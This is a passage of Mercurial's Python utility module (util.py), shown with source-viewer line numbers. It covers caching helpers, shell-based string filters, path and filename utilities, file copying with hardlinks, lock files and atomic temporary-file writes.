890 890 The new node is inserted before the head node.
891 891 """
892 892 head = self._head
893 893 node = _lrucachenode()
894 894 head.prev.next = node
895 895 node.prev = head.prev
896 896 node.next = head
897 897 head.prev = node
898 898 self._size += 1
899 899 return node
900 900
901 901 def lrucachefunc(func):
902 902 '''cache most recent results of function calls'''
903 903 cache = {}
904 904 order = collections.deque()
905 905 if func.__code__.co_argcount == 1:
906 906 def f(arg):
907 907 if arg not in cache:
908 908 if len(cache) > 20:
909 909 del cache[order.popleft()]
910 910 cache[arg] = func(arg)
911 911 else:
912 912 order.remove(arg)
913 913 order.append(arg)
914 914 return cache[arg]
915 915 else:
916 916 def f(*args):
917 917 if args not in cache:
918 918 if len(cache) > 20:
919 919 del cache[order.popleft()]
920 920 cache[args] = func(*args)
921 921 else:
922 922 order.remove(args)
923 923 order.append(args)
924 924 return cache[args]
925 925
926 926 return f
927 927
928 928 class propertycache(object):
929 929 def __init__(self, func):
930 930 self.func = func
931 931 self.name = func.__name__
932 932 def __get__(self, obj, type=None):
933 933 result = self.func(obj)
934 934 self.cachevalue(obj, result)
935 935 return result
936 936
937 937 def cachevalue(self, obj, value):
938 938 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
939 939 obj.__dict__[self.name] = value
940 940
941 941 def clearcachedproperty(obj, prop):
942 942 '''clear a cached property value, if one has been set'''
943 943 if prop in obj.__dict__:
944 944 del obj.__dict__[prop]
945 945
946 946 def pipefilter(s, cmd):
947 947 '''filter string S through command CMD, returning its output'''
948 948 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
949 949 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
950 950 pout, perr = p.communicate(s)
951 951 return pout
952 952
953 953 def tempfilter(s, cmd):
954 954 '''filter string S through a pair of temporary files with CMD.
955 955 CMD is used as a template to create the real command to be run,
956 956 with the strings INFILE and OUTFILE replaced by the real names of
957 957 the temporary files generated.'''
958 958 inname, outname = None, None
959 959 try:
960 960 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
961 961 fp = os.fdopen(infd, pycompat.sysstr('wb'))
962 962 fp.write(s)
963 963 fp.close()
964 964 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
965 965 os.close(outfd)
966 966 cmd = cmd.replace('INFILE', inname)
967 967 cmd = cmd.replace('OUTFILE', outname)
968 968 code = os.system(cmd)
969 969 if pycompat.sysplatform == 'OpenVMS' and code & 1:
970 970 code = 0
971 971 if code:
972 972 raise Abort(_("command '%s' failed: %s") %
973 973 (cmd, explainexit(code)))
974 974 return readfile(outname)
975 975 finally:
976 976 try:
977 977 if inname:
978 978 os.unlink(inname)
979 979 except OSError:
980 980 pass
981 981 try:
982 982 if outname:
983 983 os.unlink(outname)
984 984 except OSError:
985 985 pass
986 986
987 987 filtertable = {
988 988 'tempfile:': tempfilter,
989 989 'pipe:': pipefilter,
990 990 }
991 991
992 992 def filter(s, cmd):
993 993 "filter a string through a command that transforms its input to its output"
994 994 for name, fn in filtertable.iteritems():
995 995 if cmd.startswith(name):
996 996 return fn(s, cmd[len(name):].lstrip())
997 997 return pipefilter(s, cmd)
998 998
999 999 def binary(s):
1000 1000 """return true if a string is binary data"""
1001 1001 return bool(s and '\0' in s)
1002 1002
1003 1003 def increasingchunks(source, min=1024, max=65536):
1004 1004 '''return no less than min bytes per chunk while data remains,
1005 1005 doubling min after each chunk until it reaches max'''
1006 1006 def log2(x):
1007 1007 if not x:
1008 1008 return 0
1009 1009 i = 0
1010 1010 while x:
1011 1011 x >>= 1
1012 1012 i += 1
1013 1013 return i - 1
1014 1014
1015 1015 buf = []
1016 1016 blen = 0
1017 1017 for chunk in source:
1018 1018 buf.append(chunk)
1019 1019 blen += len(chunk)
1020 1020 if blen >= min:
1021 1021 if min < max:
1022 1022 min = min << 1
1023 1023 nmin = 1 << log2(blen)
1024 1024 if nmin > min:
1025 1025 min = nmin
1026 1026 if min > max:
1027 1027 min = max
1028 1028 yield ''.join(buf)
1029 1029 blen = 0
1030 1030 buf = []
1031 1031 if buf:
1032 1032 yield ''.join(buf)
1033 1033
1034 1034 Abort = error.Abort
1035 1035
1036 1036 def always(fn):
1037 1037 return True
1038 1038
1039 1039 def never(fn):
1040 1040 return False
1041 1041
1042 1042 def nogc(func):
1043 1043 """disable garbage collector
1044 1044
1045 1045 Python's garbage collector triggers a GC each time a certain number of
1046 1046 container objects (the number being defined by gc.get_threshold()) are
1047 1047 allocated even when marked not to be tracked by the collector. Tracking has
1048 1048 no effect on when GCs are triggered, only on what objects the GC looks
1049 1049 into. As a workaround, disable GC while building complex (huge)
1050 1050 containers.
1051 1051
1052 1052 This garbage collector issue have been fixed in 2.7. But it still affect
1053 1053 CPython's performance.
1054 1054 """
1055 1055 def wrapper(*args, **kwargs):
1056 1056 gcenabled = gc.isenabled()
1057 1057 gc.disable()
1058 1058 try:
1059 1059 return func(*args, **kwargs)
1060 1060 finally:
1061 1061 if gcenabled:
1062 1062 gc.enable()
1063 1063 return wrapper
1064 1064
1065 1065 if pycompat.ispypy:
1066 1066 # PyPy runs slower with gc disabled
1067 1067 nogc = lambda x: x
1068 1068
1069 1069 def pathto(root, n1, n2):
1070 1070 '''return the relative path from one place to another.
1071 1071 root should use os.sep to separate directories
1072 1072 n1 should use os.sep to separate directories
1073 1073 n2 should use "/" to separate directories
1074 1074 returns an os.sep-separated path.
1075 1075
1076 1076 If n1 is a relative path, it's assumed it's
1077 1077 relative to root.
1078 1078 n2 should always be relative to root.
1079 1079 '''
1080 1080 if not n1:
1081 1081 return localpath(n2)
1082 1082 if os.path.isabs(n1):
1083 1083 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1084 1084 return os.path.join(root, localpath(n2))
1085 1085 n2 = '/'.join((pconvert(root), n2))
1086 1086 a, b = splitpath(n1), n2.split('/')
1087 1087 a.reverse()
1088 1088 b.reverse()
1089 1089 while a and b and a[-1] == b[-1]:
1090 1090 a.pop()
1091 1091 b.pop()
1092 1092 b.reverse()
1093 1093 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1094 1094
1095 1095 def mainfrozen():
1096 1096 """return True if we are a frozen executable.
1097 1097
1098 1098 The code supports py2exe (most common, Windows only) and tools/freeze
1099 1099 (portable, not much used).
1100 1100 """
1101 1101 return (safehasattr(sys, "frozen") or # new py2exe
1102 1102 safehasattr(sys, "importers") or # old py2exe
1103 1103 imp.is_frozen(u"__main__")) # tools/freeze
1104 1104
1105 1105 # the location of data files matching the source code
1106 1106 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1107 1107 # executable version (py2exe) doesn't support __file__
1108 1108 datapath = os.path.dirname(pycompat.sysexecutable)
1109 1109 else:
1110 1110 datapath = os.path.dirname(pycompat.fsencode(__file__))
1111 1111
1112 1112 i18n.setdatapath(datapath)
1113 1113
1114 1114 _hgexecutable = None
1115 1115
1116 1116 def hgexecutable():
1117 1117 """return location of the 'hg' executable.
1118 1118
1119 1119 Defaults to $HG or 'hg' in the search path.
1120 1120 """
1121 1121 if _hgexecutable is None:
1122 1122 hg = encoding.environ.get('HG')
1123 1123 mainmod = sys.modules[pycompat.sysstr('__main__')]
1124 1124 if hg:
1125 1125 _sethgexecutable(hg)
1126 1126 elif mainfrozen():
1127 1127 if getattr(sys, 'frozen', None) == 'macosx_app':
1128 1128 # Env variable set by py2app
1129 1129 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1130 1130 else:
1131 1131 _sethgexecutable(pycompat.sysexecutable)
1132 1132 elif (os.path.basename(
1133 1133 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1134 1134 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1135 1135 else:
1136 1136 exe = findexe('hg') or os.path.basename(sys.argv[0])
1137 1137 _sethgexecutable(exe)
1138 1138 return _hgexecutable
1139 1139
1140 1140 def _sethgexecutable(path):
1141 1141 """set location of the 'hg' executable"""
1142 1142 global _hgexecutable
1143 1143 _hgexecutable = path
1144 1144
1145 1145 def _isstdout(f):
1146 1146 fileno = getattr(f, 'fileno', None)
1147 1147 return fileno and fileno() == sys.__stdout__.fileno()
1148 1148
1149 1149 def shellenviron(environ=None):
1150 1150 """return environ with optional override, useful for shelling out"""
1151 1151 def py2shell(val):
1152 1152 'convert python object into string that is useful to shell'
1153 1153 if val is None or val is False:
1154 1154 return '0'
1155 1155 if val is True:
1156 1156 return '1'
1157 1157 return str(val)
1158 1158 env = dict(encoding.environ)
1159 1159 if environ:
1160 1160 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1161 1161 env['HG'] = hgexecutable()
1162 1162 return env
1163 1163
1164 1164 def system(cmd, environ=None, cwd=None, out=None):
1165 1165 '''enhanced shell command execution.
1166 1166 run with environment maybe modified, maybe in different dir.
1167 1167
1168 1168 if out is specified, it is assumed to be a file-like object that has a
1169 1169 write() method. stdout and stderr will be redirected to out.'''
1170 1170 try:
1171 1171 stdout.flush()
1172 1172 except Exception:
1173 1173 pass
1174 1174 cmd = quotecommand(cmd)
1175 1175 env = shellenviron(environ)
1176 1176 if out is None or _isstdout(out):
1177 1177 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1178 1178 env=env, cwd=cwd)
1179 1179 else:
1180 1180 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1181 1181 env=env, cwd=cwd, stdout=subprocess.PIPE,
1182 1182 stderr=subprocess.STDOUT)
1183 1183 for line in iter(proc.stdout.readline, ''):
1184 1184 out.write(line)
1185 1185 proc.wait()
1186 1186 rc = proc.returncode
1187 1187 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1188 1188 rc = 0
1189 1189 return rc
1190 1190
1191 1191 def checksignature(func):
1192 1192 '''wrap a function with code to check for calling errors'''
1193 1193 def check(*args, **kwargs):
1194 1194 try:
1195 1195 return func(*args, **kwargs)
1196 1196 except TypeError:
1197 1197 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1198 1198 raise error.SignatureError
1199 1199 raise
1200 1200
1201 1201 return check
1202 1202
1203 1203 # a whilelist of known filesystems where hardlink works reliably
1204 1204 _hardlinkfswhitelist = {
1205 1205 'btrfs',
1206 1206 'ext2',
1207 1207 'ext3',
1208 1208 'ext4',
1209 1209 'hfs',
1210 1210 'jfs',
1211 1211 'NTFS',
1212 1212 'reiserfs',
1213 1213 'tmpfs',
1214 1214 'ufs',
1215 1215 'xfs',
1216 1216 'zfs',
1217 1217 }
1218 1218
1219 1219 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1220 1220 '''copy a file, preserving mode and optionally other stat info like
1221 1221 atime/mtime
1222 1222
1223 1223 checkambig argument is used with filestat, and is useful only if
1224 1224 destination file is guarded by any lock (e.g. repo.lock or
1225 1225 repo.wlock).
1226 1226
1227 1227 copystat and checkambig should be exclusive.
1228 1228 '''
1229 1229 assert not (copystat and checkambig)
1230 1230 oldstat = None
1231 1231 if os.path.lexists(dest):
1232 1232 if checkambig:
1233 1233 oldstat = checkambig and filestat.frompath(dest)
1234 1234 unlink(dest)
1235 1235 if hardlink:
1236 1236 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1237 1237 # unless we are confident that dest is on a whitelisted filesystem.
1238 1238 try:
1239 1239 fstype = getfstype(os.path.dirname(dest))
1240 1240 except OSError:
1241 1241 fstype = None
1242 1242 if fstype not in _hardlinkfswhitelist:
1243 1243 hardlink = False
1244 1244 if hardlink:
1245 1245 try:
1246 1246 oslink(src, dest)
1247 1247 return
1248 1248 except (IOError, OSError):
1249 1249 pass # fall back to normal copy
1250 1250 if os.path.islink(src):
1251 1251 os.symlink(os.readlink(src), dest)
1252 1252 # copytime is ignored for symlinks, but in general copytime isn't needed
1253 1253 # for them anyway
1254 1254 else:
1255 1255 try:
1256 1256 shutil.copyfile(src, dest)
1257 1257 if copystat:
1258 1258 # copystat also copies mode
1259 1259 shutil.copystat(src, dest)
1260 1260 else:
1261 1261 shutil.copymode(src, dest)
1262 1262 if oldstat and oldstat.stat:
1263 1263 newstat = filestat.frompath(dest)
1264 1264 if newstat.isambig(oldstat):
1265 1265 # stat of copied file is ambiguous to original one
1266 1266 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1267 1267 os.utime(dest, (advanced, advanced))
1268 1268 except shutil.Error as inst:
1269 1269 raise Abort(str(inst))
1270 1270
1271 1271 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1272 1272 """Copy a directory tree using hardlinks if possible."""
1273 1273 num = 0
1274 1274
1275 1275 gettopic = lambda: hardlink and _('linking') or _('copying')
1276 1276
1277 1277 if os.path.isdir(src):
1278 1278 if hardlink is None:
1279 1279 hardlink = (os.stat(src).st_dev ==
1280 1280 os.stat(os.path.dirname(dst)).st_dev)
1281 1281 topic = gettopic()
1282 1282 os.mkdir(dst)
1283 1283 for name, kind in listdir(src):
1284 1284 srcname = os.path.join(src, name)
1285 1285 dstname = os.path.join(dst, name)
1286 1286 def nprog(t, pos):
1287 1287 if pos is not None:
1288 1288 return progress(t, pos + num)
1289 1289 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1290 1290 num += n
1291 1291 else:
1292 1292 if hardlink is None:
1293 1293 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1294 1294 os.stat(os.path.dirname(dst)).st_dev)
1295 1295 topic = gettopic()
1296 1296
1297 1297 if hardlink:
1298 1298 try:
1299 1299 oslink(src, dst)
1300 1300 except (IOError, OSError):
1301 1301 hardlink = False
1302 1302 shutil.copy(src, dst)
1303 1303 else:
1304 1304 shutil.copy(src, dst)
1305 1305 num += 1
1306 1306 progress(topic, num)
1307 1307 progress(topic, None)
1308 1308
1309 1309 return hardlink, num
1310 1310
1311 1311 _winreservednames = {
1312 1312 'con', 'prn', 'aux', 'nul',
1313 1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1314 1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1315 1315 }
1316 1316 _winreservedchars = ':*?"<>|'
1317 1317 def checkwinfilename(path):
1318 1318 r'''Check that the base-relative path is a valid filename on Windows.
1319 1319 Returns None if the path is ok, or a UI string describing the problem.
1320 1320
1321 1321 >>> checkwinfilename(b"just/a/normal/path")
1322 1322 >>> checkwinfilename(b"foo/bar/con.xml")
1323 1323 "filename contains 'con', which is reserved on Windows"
1324 1324 >>> checkwinfilename(b"foo/con.xml/bar")
1325 1325 "filename contains 'con', which is reserved on Windows"
1326 1326 >>> checkwinfilename(b"foo/bar/xml.con")
1327 1327 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1328 1328 "filename contains 'AUX', which is reserved on Windows"
1329 1329 >>> checkwinfilename(b"foo/bar/bla:.txt")
1330 1330 "filename contains ':', which is reserved on Windows"
1331 1331 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1332 1332 "filename contains '\\x07', which is invalid on Windows"
1333 1333 >>> checkwinfilename(b"foo/bar/bla ")
1334 1334 "filename ends with ' ', which is not allowed on Windows"
1335 1335 >>> checkwinfilename(b"../bar")
1336 1336 >>> checkwinfilename(b"foo\\")
1337 1337 "filename ends with '\\', which is invalid on Windows"
1338 1338 >>> checkwinfilename(b"foo\\/bar")
1339 1339 "directory name ends with '\\', which is invalid on Windows"
1340 1340 '''
1341 1341 if path.endswith('\\'):
1342 1342 return _("filename ends with '\\', which is invalid on Windows")
1343 1343 if '\\/' in path:
1344 1344 return _("directory name ends with '\\', which is invalid on Windows")
1345 1345 for n in path.replace('\\', '/').split('/'):
1346 1346 if not n:
1347 1347 continue
1348 1348 for c in _filenamebytestr(n):
1349 1349 if c in _winreservedchars:
1350 1350 return _("filename contains '%s', which is reserved "
1351 1351 "on Windows") % c
1352 1352 if ord(c) <= 31:
1353 1353 return _("filename contains '%s', which is invalid "
1354 1354 "on Windows") % escapestr(c)
1355 1355 base = n.split('.')[0]
1356 1356 if base and base.lower() in _winreservednames:
1357 1357 return _("filename contains '%s', which is reserved "
1358 1358 "on Windows") % base
1359 1359 t = n[-1:]
1360 1360 if t in '. ' and n not in '..':
1361 1361 return _("filename ends with '%s', which is not allowed "
1362 1362 "on Windows") % t
1363 1363
1364 1364 if pycompat.iswindows:
1365 1365 checkosfilename = checkwinfilename
1366 1366 timer = time.clock
1367 1367 else:
1368 1368 checkosfilename = platform.checkosfilename
1369 1369 timer = time.time
1370 1370
1371 1371 if safehasattr(time, "perf_counter"):
1372 1372 timer = time.perf_counter
1373 1373
1374 1374 def makelock(info, pathname):
1375 1375 try:
1376 1376 return os.symlink(info, pathname)
1377 1377 except OSError as why:
1378 1378 if why.errno == errno.EEXIST:
1379 1379 raise
1380 1380 except AttributeError: # no symlink in os
1381 1381 pass
1382 1382
1383 1383 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1384 1384 os.write(ld, info)
1385 1385 os.close(ld)
1386 1386
1387 1387 def readlock(pathname):
1388 1388 try:
1389 1389 return os.readlink(pathname)
1390 1390 except OSError as why:
1391 1391 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1392 1392 raise
1393 1393 except AttributeError: # no symlink in os
1394 1394 pass
1395 1395 fp = posixfile(pathname)
1396 1396 r = fp.read()
1397 1397 fp.close()
1398 1398 return r
1399 1399
1400 1400 def fstat(fp):
1401 1401 '''stat file object that may not have fileno method.'''
1402 1402 try:
1403 1403 return os.fstat(fp.fileno())
1404 1404 except AttributeError:
1405 1405 return os.stat(fp.name)
1406 1406
1407 1407 # File system features
1408 1408
1409 1409 def fscasesensitive(path):
1410 1410 """
1411 1411 Return true if the given path is on a case-sensitive filesystem
1412 1412
1413 1413 Requires a path (like /foo/.hg) ending with a foldable final
1414 1414 directory component.
1415 1415 """
1416 1416 s1 = os.lstat(path)
1417 1417 d, b = os.path.split(path)
1418 1418 b2 = b.upper()
1419 1419 if b == b2:
1420 1420 b2 = b.lower()
1421 1421 if b == b2:
1422 1422 return True # no evidence against case sensitivity
1423 1423 p2 = os.path.join(d, b2)
1424 1424 try:
1425 1425 s2 = os.lstat(p2)
1426 1426 if s2 == s1:
1427 1427 return False
1428 1428 return True
1429 1429 except OSError:
1430 1430 return True
1431 1431
1432 1432 try:
1433 1433 import re2
1434 1434 _re2 = None
1435 1435 except ImportError:
1436 1436 _re2 = False
1437 1437
1438 1438 class _re(object):
1439 1439 def _checkre2(self):
1440 1440 global _re2
1441 1441 try:
1442 1442 # check if match works, see issue3964
1443 1443 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1444 1444 except ImportError:
1445 1445 _re2 = False
1446 1446
1447 1447 def compile(self, pat, flags=0):
1448 1448 '''Compile a regular expression, using re2 if possible
1449 1449
1450 1450 For best performance, use only re2-compatible regexp features. The
1451 1451 only flags from the re module that are re2-compatible are
1452 1452 IGNORECASE and MULTILINE.'''
1453 1453 if _re2 is None:
1454 1454 self._checkre2()
1455 1455 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1456 1456 if flags & remod.IGNORECASE:
1457 1457 pat = '(?i)' + pat
1458 1458 if flags & remod.MULTILINE:
1459 1459 pat = '(?m)' + pat
1460 1460 try:
1461 1461 return re2.compile(pat)
1462 1462 except re2.error:
1463 1463 pass
1464 1464 return remod.compile(pat, flags)
1465 1465
1466 1466 @propertycache
1467 1467 def escape(self):
1468 1468 '''Return the version of escape corresponding to self.compile.
1469 1469
1470 1470 This is imperfect because whether re2 or re is used for a particular
1471 1471 function depends on the flags, etc, but it's the best we can do.
1472 1472 '''
1473 1473 global _re2
1474 1474 if _re2 is None:
1475 1475 self._checkre2()
1476 1476 if _re2:
1477 1477 return re2.escape
1478 1478 else:
1479 1479 return remod.escape
1480 1480
1481 1481 re = _re()
1482 1482
1483 1483 _fspathcache = {}
1484 1484 def fspath(name, root):
1485 1485 '''Get name in the case stored in the filesystem
1486 1486
1487 1487 The name should be relative to root, and be normcase-ed for efficiency.
1488 1488
1489 1489 Note that this function is unnecessary, and should not be
1490 1490 called, for case-sensitive filesystems (simply because it's expensive).
1491 1491
1492 1492 The root should be normcase-ed, too.
1493 1493 '''
1494 1494 def _makefspathcacheentry(dir):
1495 1495 return dict((normcase(n), n) for n in os.listdir(dir))
1496 1496
1497 1497 seps = pycompat.ossep
1498 1498 if pycompat.osaltsep:
1499 1499 seps = seps + pycompat.osaltsep
1500 1500 # Protect backslashes. This gets silly very quickly.
1501 1501 seps.replace('\\','\\\\')
1502 1502 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1503 1503 dir = os.path.normpath(root)
1504 1504 result = []
1505 1505 for part, sep in pattern.findall(name):
1506 1506 if sep:
1507 1507 result.append(sep)
1508 1508 continue
1509 1509
1510 1510 if dir not in _fspathcache:
1511 1511 _fspathcache[dir] = _makefspathcacheentry(dir)
1512 1512 contents = _fspathcache[dir]
1513 1513
1514 1514 found = contents.get(part)
1515 1515 if not found:
1516 1516 # retry "once per directory" per "dirstate.walk" which
1517 1517 # may take place for each patches of "hg qpush", for example
1518 1518 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1519 1519 found = contents.get(part)
1520 1520
1521 1521 result.append(found or part)
1522 1522 dir = os.path.join(dir, part)
1523 1523
1524 1524 return ''.join(result)
1525 1525
1526 1526 def checknlink(testfile):
1527 1527 '''check whether hardlink count reporting works properly'''
1528 1528
1529 1529 # testfile may be open, so we need a separate file for checking to
1530 1530 # work around issue2543 (or testfile may get lost on Samba shares)
1531 1531 f1, f2, fp = None, None, None
1532 1532 try:
1533 1533 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1534 1534 suffix='1~', dir=os.path.dirname(testfile))
1535 1535 os.close(fd)
1536 1536 f2 = '%s2~' % f1[:-2]
1537 1537
1538 1538 oslink(f1, f2)
1539 1539 # nlinks() may behave differently for files on Windows shares if
1540 1540 # the file is open.
1541 1541 fp = posixfile(f2)
1542 1542 return nlinks(f2) > 1
1543 1543 except OSError:
1544 1544 return False
1545 1545 finally:
1546 1546 if fp is not None:
1547 1547 fp.close()
1548 1548 for f in (f1, f2):
1549 1549 try:
1550 1550 if f is not None:
1551 1551 os.unlink(f)
1552 1552 except OSError:
1553 1553 pass
1554 1554
1555 1555 def endswithsep(path):
1556 1556 '''Check path ends with os.sep or os.altsep.'''
1557 1557 return (path.endswith(pycompat.ossep)
1558 1558 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1559 1559
1560 1560 def splitpath(path):
1561 1561 '''Split path by os.sep.
1562 1562 Note that this function does not use os.altsep because this is
1563 1563 an alternative of simple "xxx.split(os.sep)".
1564 1564 It is recommended to use os.path.normpath() before using this
1565 1565 function if need.'''
1566 1566 return path.split(pycompat.ossep)
1567 1567
1568 1568 def gui():
1569 1569 '''Are we running in a GUI?'''
1570 1570 if pycompat.isdarwin:
1571 1571 if 'SSH_CONNECTION' in encoding.environ:
1572 1572 # handle SSH access to a box where the user is logged in
1573 1573 return False
1574 1574 elif getattr(osutil, 'isgui', None):
1575 1575 # check if a CoreGraphics session is available
1576 1576 return osutil.isgui()
1577 1577 else:
1578 1578 # pure build; use a safe default
1579 1579 return True
1580 1580 else:
1581 1581 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1582 1582
1583 1583 def mktempcopy(name, emptyok=False, createmode=None):
1584 1584 """Create a temporary file with the same contents from name
1585 1585
1586 1586 The permission bits are copied from the original file.
1587 1587
1588 1588 If the temporary file is going to be truncated immediately, you
1589 1589 can use emptyok=True as an optimization.
1590 1590
1591 1591 Returns the name of the temporary file.
1592 1592 """
1593 1593 d, fn = os.path.split(name)
1594 1594 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1595 1595 os.close(fd)
1596 1596 # Temporary files are created with mode 0600, which is usually not
1597 1597 # what we want. If the original file already exists, just copy
1598 1598 # its mode. Otherwise, manually obey umask.
1599 1599 copymode(name, temp, createmode)
1600 1600 if emptyok:
1601 1601 return temp
1602 1602 try:
1603 1603 try:
1604 1604 ifp = posixfile(name, "rb")
1605 1605 except IOError as inst:
1606 1606 if inst.errno == errno.ENOENT:
1607 1607 return temp
1608 1608 if not getattr(inst, 'filename', None):
1609 1609 inst.filename = name
1610 1610 raise
1611 1611 ofp = posixfile(temp, "wb")
1612 1612 for chunk in filechunkiter(ifp):
1613 1613 ofp.write(chunk)
1614 1614 ifp.close()
1615 1615 ofp.close()
1616 1616 except: # re-raises
1617 1617 try:
1618 1618 os.unlink(temp)
1619 1619 except OSError:
1620 1620 pass
1621 1621 raise
1622 1622 return temp
1623 1623
1624 1624 class filestat(object):
1625 1625 """help to exactly detect change of a file
1626 1626
1627 1627 'stat' attribute is result of 'os.stat()' if specified 'path'
1628 1628 exists. Otherwise, it is None. This can avoid preparative
1629 1629 'exists()' examination on client side of this class.
1630 1630 """
1631 1631 def __init__(self, stat):
1632 1632 self.stat = stat
1633 1633
1634 1634 @classmethod
1635 1635 def frompath(cls, path):
1636 1636 try:
1637 1637 stat = os.stat(path)
1638 1638 except OSError as err:
1639 1639 if err.errno != errno.ENOENT:
1640 1640 raise
1641 1641 stat = None
1642 1642 return cls(stat)
1643 1643
1644 1644 @classmethod
1645 1645 def fromfp(cls, fp):
1646 1646 stat = os.fstat(fp.fileno())
1647 1647 return cls(stat)
1648 1648
1649 1649 __hash__ = object.__hash__
1650 1650
1651 1651 def __eq__(self, old):
1652 1652 try:
1653 1653 # if ambiguity between stat of new and old file is
1654 1654 # avoided, comparison of size, ctime and mtime is enough
1655 1655 # to exactly detect change of a file regardless of platform
1656 1656 return (self.stat.st_size == old.stat.st_size and
1657 1657 self.stat.st_ctime == old.stat.st_ctime and
1658 1658 self.stat.st_mtime == old.stat.st_mtime)
1659 1659 except AttributeError:
1660 1660 pass
1661 1661 try:
1662 1662 return self.stat is None and old.stat is None
1663 1663 except AttributeError:
1664 1664 return False
1665 1665
1666 1666 def isambig(self, old):
1667 1667 """Examine whether new (= self) stat is ambiguous against old one
1668 1668
1669 1669 "S[N]" below means stat of a file at N-th change:
1670 1670
1671 1671 - S[n-1].ctime < S[n].ctime: can detect change of a file
1672 1672 - S[n-1].ctime == S[n].ctime
1673 1673 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1674 1674 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1675 1675 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1676 1676 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1677 1677
1678 1678 Case (*2) above means that a file was changed twice or more at
1679 1679 same time in sec (= S[n-1].ctime), and comparison of timestamp
1680 1680 is ambiguous.
1681 1681
1682 1682 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1683 1683 timestamp is ambiguous".
1684 1684
1685 1685 But advancing mtime only in case (*2) doesn't work as
1686 1686 expected, because naturally advanced S[n].mtime in case (*1)
1687 1687 might be equal to manually advanced S[n-1 or earlier].mtime.
1688 1688
1689 1689 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1690 1690 treated as ambiguous regardless of mtime, to avoid overlooking
1691 1691 by confliction between such mtime.
1692 1692
1693 1693 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1694 1694 S[n].mtime", even if size of a file isn't changed.
1695 1695 """
1696 1696 try:
1697 1697 return (self.stat.st_ctime == old.stat.st_ctime)
1698 1698 except AttributeError:
1699 1699 return False
1700 1700
1701 1701 def avoidambig(self, path, old):
1702 1702 """Change file stat of specified path to avoid ambiguity
1703 1703
1704 1704 'old' should be previous filestat of 'path'.
1705 1705
1706 1706 This skips avoiding ambiguity, if a process doesn't have
1707 1707 appropriate privileges for 'path'. This returns False in this
1708 1708 case.
1709 1709
1710 1710 Otherwise, this returns True, as "ambiguity is avoided".
1711 1711 """
1712 1712 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1713 1713 try:
1714 1714 os.utime(path, (advanced, advanced))
1715 1715 except OSError as inst:
1716 1716 if inst.errno == errno.EPERM:
1717 1717 # utime() on the file created by another user causes EPERM,
1718 1718 # if a process doesn't have appropriate privileges
1719 1719 return False
1720 1720 raise
1721 1721 return True
1722 1722
1723 1723 def __ne__(self, other):
1724 1724 return not self == other
1725 1725
1726 1726 class atomictempfile(object):
1727 1727 '''writable file object that atomically updates a file
1728 1728
1729 1729 All writes will go to a temporary copy of the original file. Call
1730 1730 close() when you are done writing, and atomictempfile will rename
1731 1731 the temporary copy to the original name, making the changes
1732 1732 visible. If the object is destroyed without being closed, all your
1733 1733 writes are discarded.
1734 1734
1735 1735 checkambig argument of constructor is used with filestat, and is
1736 1736 useful only if target file is guarded by any lock (e.g. repo.lock
1737 1737 or repo.wlock).
1738 1738 '''
1739 1739 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1740 1740 self.__name = name # permanent name
1741 1741 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1742 1742 createmode=createmode)
1743 1743 self._fp = posixfile(self._tempname, mode)
1744 1744 self._checkambig = checkambig
1745 1745
1746 1746 # delegated methods
1747 1747 self.read = self._fp.read
1748 1748 self.write = self._fp.write
1749 1749 self.seek = self._fp.seek
1750 1750 self.tell = self._fp.tell
1751 1751 self.fileno = self._fp.fileno
1752 1752
1753 1753 def close(self):
1754 1754 if not self._fp.closed:
1755 1755 self._fp.close()
1756 1756 filename = localpath(self.__name)
1757 1757 oldstat = self._checkambig and filestat.frompath(filename)
1758 1758 if oldstat and oldstat.stat:
1759 1759 rename(self._tempname, filename)
1760 1760 newstat = filestat.frompath(filename)
1761 1761 if newstat.isambig(oldstat):
1762 1762 # stat of changed file is ambiguous to original one
